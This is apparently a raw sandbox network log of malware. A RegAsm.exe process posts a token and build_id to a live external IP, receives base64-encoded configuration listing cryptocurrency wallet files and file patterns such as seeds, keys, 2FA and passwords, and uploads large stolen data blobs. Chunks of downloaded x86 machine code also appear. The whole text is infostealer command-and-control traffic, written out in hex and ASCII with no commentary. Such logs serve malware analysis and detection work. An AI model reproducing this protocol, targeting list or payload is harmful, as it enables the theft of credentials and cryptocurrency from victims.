2024-09-26 20:56:46 UTC	16384	IN	Data Raw: e7 00 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
2024-09-26 20:56:47 UTC	16384	IN	Data Raw: 59 18 e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff Data Ascii: Y`P19F$WtL$ u\|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rt
2024-09-26 20:56:47 UTC	16384	IN	Data Raw: 00 00 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 Data Ascii: 4D$$D$@@L$;A<\|$7h't$D$$hH\|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49757	5.75.211.162	443	7476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:56:49 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFIJEGCBGIDGHIDHDGCB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 1145 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:56:49 UTC	1145	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 4a 45 47 43 42 47 49 44 47 48 49 44 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 33 36 31 36 66 37 38 62 36 33 30 32 61 32 39 33 63 38 32 65 33 35 30 31 62 37 30 33 36 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 45 47 43 42 47 49 44 47 48 49 44 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 45 47 43 42 47 49 44 47 48 49 44 48 44 47 43 42 0d 0a 43 6f 6e 74 Data Ascii: ------KFIJEGCBGIDGHIDHDGCBContent-Disposition: form-data; name="token"c23616f78b6302a293c82e3501b7036e------KFIJEGCBGIDGHIDHDGCBContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------KFIJEGCBGIDGHIDHDGCBCont
2024-09-26 20:56:50 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 20:56:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 20:56:50 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49758	5.75.211.162	443	7476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:56:50 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KECGDBFCBKFIDHIDHDHI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:56:50 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 33 36 31 36 66 37 38 62 36 33 30 32 61 32 39 33 63 38 32 65 33 35 30 31 62 37 30 33 36 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 0d 0a 43 6f 6e 74 Data Ascii: ------KECGDBFCBKFIDHIDHDHIContent-Disposition: form-data; name="token"c23616f78b6302a293c82e3501b7036e------KECGDBFCBKFIDHIDHDHIContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------KECGDBFCBKFIDHIDHDHICont
2024-09-26 20:56:51 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 20:56:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 20:56:51 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49759	5.75.211.162	443	7476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:56:52 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGCAAFHIEBKJKEBFIEHD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:56:52 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 33 36 31 36 66 37 38 62 36 33 30 32 61 32 39 33 63 38 32 65 33 35 30 31 62 37 30 33 36 65 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74 Data Ascii: ------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="token"c23616f78b6302a293c82e3501b7036e------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------BGCAAFHIEBKJKEBFIEHDCont
2024-09-26 20:56:52 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 20:56:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 20:56:52 UTC	1524	IN	Data Raw: 35 65 38 0d 0a 52 6d 78 68 63 32 68 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49760	5.75.211.162	443	7476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:56:53 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKECBAKFBGDGCBGDBAEC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 461 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:56:53 UTC	461	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 43 42 41 4b 46 42 47 44 47 43 42 47 44 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 33 36 31 36 66 37 38 62 36 33 30 32 61 32 39 33 63 38 32 65 33 35 30 31 62 37 30 33 36 65 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 42 41 4b 46 42 47 44 47 43 42 47 44 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 42 41 4b 46 42 47 44 47 43 42 47 44 42 41 45 43 0d 0a 43 6f 6e 74 Data Ascii: ------BKECBAKFBGDGCBGDBAECContent-Disposition: form-data; name="token"c23616f78b6302a293c82e3501b7036e------BKECBAKFBGDGCBGDBAECContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------BKECBAKFBGDGCBGDBAECCont
2024-09-26 20:56:54 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 20:56:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 20:56:54 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49762	5.75.211.162	443	7476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:56:55 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBAAFCAFCBKFHJJJKKFH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 130297 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:56:55 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 33 36 31 36 66 37 38 62 36 33 30 32 61 32 39 33 63 38 32 65 33 35 30 31 62 37 30 33 36 65 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 0d 0a 43 6f 6e 74 Data Ascii: ------EBAAFCAFCBKFHJJJKKFHContent-Disposition: form-data; name="token"c23616f78b6302a293c82e3501b7036e------EBAAFCAFCBKFHJJJKKFHContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------EBAAFCAFCBKFHJJJKKFHCont
2024-09-26 20:56:55 UTC	16355	OUT	Data Raw: 2f 77 39 6e 6a 74 64 4d 31 61 34 6c 4f 49 34 74 72 75 66 51 41 4d 54 58 6d 35 73 72 34 61 33 6d 6a 32 4d 6a 64 73 57 6e 35 4d 37 57 2f 31 4b 79 30 79 33 38 2b 2b 75 59 72 65 50 4f 41 30 6a 59 79 66 51 65 70 2b 6c 59 73 66 6a 33 77 78 4c 4b 49 31 31 56 41 78 34 79 30 54 71 50 7a 4b 34 72 4a 30 50 54 6f 39 66 56 2f 46 50 69 45 4a 49 6a 62 6d 74 6f 4a 54 6d 4f 43 49 45 38 6b 48 67 39 4f 2f 31 71 33 62 2b 4b 50 43 57 73 33 49 30 73 43 46 2f 4d 4f 78 46 6c 74 38 49 35 37 41 5a 48 35 56 34 61 77 38 49 33 54 54 6b 31 76 62 5a 66 67 2f 30 50 70 33 69 4a 79 73 30 31 46 50 61 2b 37 2f 41 42 58 36 6d 70 4c 48 64 58 44 58 45 6c 72 44 61 58 56 70 63 6b 4f 72 4e 50 67 4d 4e 69 72 32 55 67 6a 6a 31 72 79 37 78 42 59 66 32 62 72 4d 31 74 35 61 78 37 63 4e 73 56 39 77 47 Data Ascii: /w9njtdM1a4lOI4trufQAMTXm5sr4a3mj2MjdsWn5M7W/1Ky0y38++uYrePOA0jYyfQep+lYsfj3wxLKI11VAx4y0TqPzK4rJ0PTo9fV/FPiEJIjbmtoJTmOCIE8kHg9O/1q3b+KPCWs3I0sCF/MOxFlt8I57AZH5V4aw8I3TTk1vbZfg/0Pp3iJys01FPa+7/ABX6mpLHdXDXElrDaXVpckOrNPgMNir2Ugjj1ry7xBYf2brM1t5ax7cNsV9wG
2024-09-26 20:56:55 UTC	16355	OUT	Data Raw: 30 4a 48 31 70 6a 51 50 2f 44 38 77 39 71 56 69 6c 4a 45 5a 70 44 30 70 53 43 4f 6f 78 52 7a 51 4e 44 61 4b 57 6b 4e 41 78 4b 4b 57 69 6d 4d 53 6b 70 61 4b 41 75 4a 53 55 74 46 41 78 76 4e 4c 7a 52 51 61 42 69 47 6b 70 61 53 67 61 44 46 4a 53 30 47 6d 41 68 46 4e 70 31 47 4b 42 6a 52 51 61 58 69 6b 6f 47 49 61 54 74 54 71 54 46 49 59 33 46 4a 2b 46 4f 49 70 4f 39 4f 77 78 43 4f 4b 54 2f 50 53 6c 78 53 6d 69 77 30 4d 49 78 53 55 2b 6d 30 44 45 50 4e 42 70 61 54 48 65 6b 4d 61 52 2b 4e 49 61 65 63 64 4f 39 4a 53 47 4d 78 7a 52 32 2f 47 6e 59 34 70 75 4f 66 54 46 4f 77 78 44 31 70 4d 5a 37 30 70 46 48 4f 44 53 47 4a 53 59 35 2f 43 6c 70 4f 33 31 6f 73 4d 44 53 64 73 55 76 36 55 68 77 52 78 52 59 59 6c 4a 31 70 65 31 48 53 67 59 6e 65 67 38 55 76 48 35 55 6d Data Ascii: 0JH1pjQP/D8w9qVilJEZpD0pSCOoxRzQNDaKWkNAxKKWimMSkpaKAuJSUtFAxvNLzRQaBiGkpaSgaDFJS0GmAhFNp1GKBjRQaXikoGIaTtTqTFIY3FJ+FOIpO9OwxCOKT/PSlxSmiw0MIxSU+m0DEPNBpaTHekMaR+NIaecdO9JSGMxzR2/GnY4puOfTFOwxD1pMZ70pFHODSGJSY5/ClpO31osMDSdsUv6UhwRxRYYlJ1pe1HSgYneg8UvH5Um
2024-09-26 20:56:55 UTC	16355	OUT	Data Raw: 69 6d 41 6c 46 42 6f 6f 41 4b 53 6c 6f 78 51 4d 53 6b 70 31 4a 51 41 6c 46 4c 69 6b 78 54 43 34 64 36 53 6c 78 52 69 69 34 78 4b 4b 57 6b 6f 75 41 6c 46 4c 53 55 77 43 6a 46 46 46 41 78 4b 4b 57 6b 70 67 46 4a 53 30 55 44 45 6f 6f 6f 6f 41 53 67 30 55 70 70 67 4a 52 51 61 42 51 4d 4b 51 30 74 46 41 43 55 55 55 63 30 78 68 52 52 52 54 41 54 74 52 53 30 6c 41 43 55 5a 6f 6f 6f 47 4c 6e 4e 46 4a 52 51 41 55 74 4a 53 30 77 43 67 30 55 6c 41 42 52 52 52 54 47 47 61 57 6b 6f 6f 45 4c 52 52 6d 69 67 41 36 55 55 55 5a 70 6a 41 30 55 55 68 6f 41 57 69 6b 70 61 41 43 69 69 6a 4e 41 43 6a 6d 69 6b 46 4c 6d 67 41 6f 4e 46 46 49 41 6f 70 4b 57 67 51 74 4a 69 6a 36 55 70 70 41 4a 67 30 75 4f 4b 4b 4b 59 41 42 37 55 59 6f 6f 70 41 4a 6a 4e 47 33 46 4f 70 61 4c 73 42 75 Data Ascii: imAlFBooAKSloxQMSkp1JQAlFLikxTC4d6SlxRii4xKKWkouAlFLSUwCjFFFAxKKWkpgFJS0UDEooooASg0UppgJRQaBQMKQ0tFACUUUc0xhRRRTATtRS0lACUZoooGLnNFJRQAUtJS0wCg0UlABRRRTGGaWkooELRRmigA6UUUZpjA0UUhoAWikpaACiijNACjmikFLmgAoNFFIAopKWgQtJij6UppAJg0uOKKKYAB7UYoopAJjNG3FOpaLsBu
2024-09-26 20:56:55 UTC	16355	OUT	Data Raw: 61 64 70 78 38 37 2f 38 41 66 4e 48 4b 2b 77 57 5a 62 70 65 74 56 42 71 64 6e 2f 66 66 2f 76 6d 6a 2b 30 72 50 76 49 34 2f 34 44 52 79 76 73 4f 78 62 70 61 70 6a 55 72 50 50 2b 73 66 2f 76 6d 6e 66 32 6e 5a 44 2f 6c 6f 2f 77 44 33 7a 52 79 76 73 49 73 39 36 30 4e 4a 2f 77 43 50 38 66 37 6a 2f 77 44 6f 4a 72 47 2f 74 4f 78 50 57 56 78 2f 77 47 70 37 58 57 72 4f 32 6d 38 31 5a 47 4a 43 73 41 43 76 71 43 4b 7a 71 30 35 53 67 30 6b 4b 7a 4f 5a 66 72 30 7a 55 5a 50 34 30 35 32 79 61 6a 4e 65 6f 74 49 6f 36 49 6f 51 6d 6d 48 33 70 57 39 36 61 54 55 74 6d 69 44 76 53 45 35 7a 52 6e 6e 70 53 47 70 5a 51 68 34 47 63 2f 68 53 64 73 30 70 2f 79 61 54 74 30 71 47 79 6b 4e 70 43 4d 44 70 53 30 55 68 6a 63 30 64 71 57 6d 35 70 44 46 70 76 76 53 6d 6b 4e 49 61 45 4e 4a Data Ascii: adpx87/8AfNHK+wWZbpetVBqdn/ff/vmj+0rPvI4/4DRyvsOxbpapjUrPP+sf/vmnf2nZD/lo/wD3zRyvsIs960NJ/wCP8f7j/wDoJrG/tOxPWVx/wGp7XWrO2m81ZGJCsACvqCKzq05Sg0kKzOZfr0zUZP4052yajNeotIo6IoQmmH3pW96aTUtmiDvSE5zRnnpSGpZQh4Gc/hSds0p/yaTt0qGykNpCMDpS0Uhjc0dqWm5pDFpvvSmkNIaENJ
2024-09-26 20:56:55 UTC	16355	OUT	Data Raw: 4d 33 4d 74 6c 64 57 75 6e 58 63 4a 6c 6d 42 76 62 71 51 41 59 61 53 4f 33 56 77 69 5a 36 67 4f 79 4f 54 6a 71 4d 59 70 4c 4e 61 43 76 5a 66 38 47 33 2f 41 4c 65 51 59 71 53 6a 65 58 2f 41 41 50 4c 37 7a 57 6f 72 4a 67 31 4f 35 76 74 50 30 33 55 4c 6d 54 53 68 48 50 4d 36 59 74 49 68 43 36 4d 41 70 4b 4f 41 69 67 34 42 42 42 79 33 55 38 31 70 69 61 4a 6a 68 5a 55 4a 39 41 77 72 75 6f 56 31 57 6a 66 59 38 6e 46 34 53 57 48 6e 79 76 55 66 52 55 63 37 46 4c 65 56 68 31 43 45 6a 38 71 71 61 74 63 2f 77 42 6e 32 74 6c 64 51 52 77 79 66 61 37 57 33 53 65 51 71 4e 74 71 54 43 72 59 49 2f 35 36 50 6b 6b 4e 36 4b 63 48 4f 63 54 69 4d 56 47 67 34 70 72 66 51 76 42 34 43 65 4b 6a 4f 55 58 62 6c 56 79 2f 52 56 62 56 54 71 75 6d 36 64 4a 4d 64 47 6d 74 2f 77 43 79 78 Data Ascii: M3MtldWunXcJlmBvbqQAYaSO3VwiZ6gOyOTjqMYpLNaCvZf8G3/ALeQYqSjeX/AAPL7zWorJg1O5vtP03ULmTShHPM6YtIhC6MApKOAig4BBBy3U81piaJjhZUJ9AwruoV1WjfY8nF4SWHnyvUfRUc7FLeVh1CEj8qqatc/wBn2tldQRwyfa7W3SeQqNtqTCrYI/56PkkN6KcHOcTiMVGg4prfQvB4CeKjOUXblVy/RVbVTqum6dJMdGmt/wCyx
2024-09-26 20:56:55 UTC	16355	OUT	Data Raw: 54 31 31 6e 78 44 70 75 6c 53 79 4d 6b 46 77 37 6d 58 61 63 45 71 71 37 73 66 6a 69 76 52 50 2b 46 64 65 46 63 66 38 67 76 50 2f 41 47 38 53 2f 77 44 78 56 65 4a 69 73 32 6c 52 72 53 70 51 68 66 6c 33 62 64 75 6c 2b 7a 37 6e 31 6d 58 38 4e 55 63 52 68 4b 65 4a 72 31 6e 48 6e 75 30 6c 44 6d 30 54 63 64 57 35 78 36 70 36 61 6e 6e 4e 46 65 6a 2f 41 50 43 75 76 43 76 2f 41 45 43 76 2f 4a 69 58 2f 77 43 4b 71 47 36 2b 47 33 68 75 57 42 6c 74 37 57 57 30 6d 2f 68 6d 6a 6d 63 6c 54 39 47 4a 46 63 2f 39 74 31 66 2b 66 53 2f 38 43 2f 38 41 74 54 73 2f 31 55 77 54 32 78 4d 76 2f 42 61 2f 2b 57 50 38 6a 7a 36 69 6c 75 37 57 37 30 66 55 57 30 33 55 6c 43 7a 71 4d 78 79 44 37 73 79 39 6d 48 2b 46 4a 58 74 34 62 45 30 38 52 54 56 53 6d 39 50 79 38 6d 66 4b 5a 68 6c 39 Data Ascii: T11nxDpulSyMkFw7mXacEqq7sfjivRP+FdeFcf8gvP/AG8S/wDxVeJis2lRrSpQhfl3bdul+z7n1mX8NUcRhKeJr1nHnu0lDm0TcdW5x6p6annNFej/APCuvCv/AECv/JiX/wCKqG6+G3huWBlt7WW0m/hmjmclT9GJFc/9t1f+fS/8C/8AtTs/1UwT2xMv/Ba/+WP8jz6ilu7W70fUW03UlCzqMxyD7sy9mH+FJXt4bE08RTVSm9Py8mfKZhl9
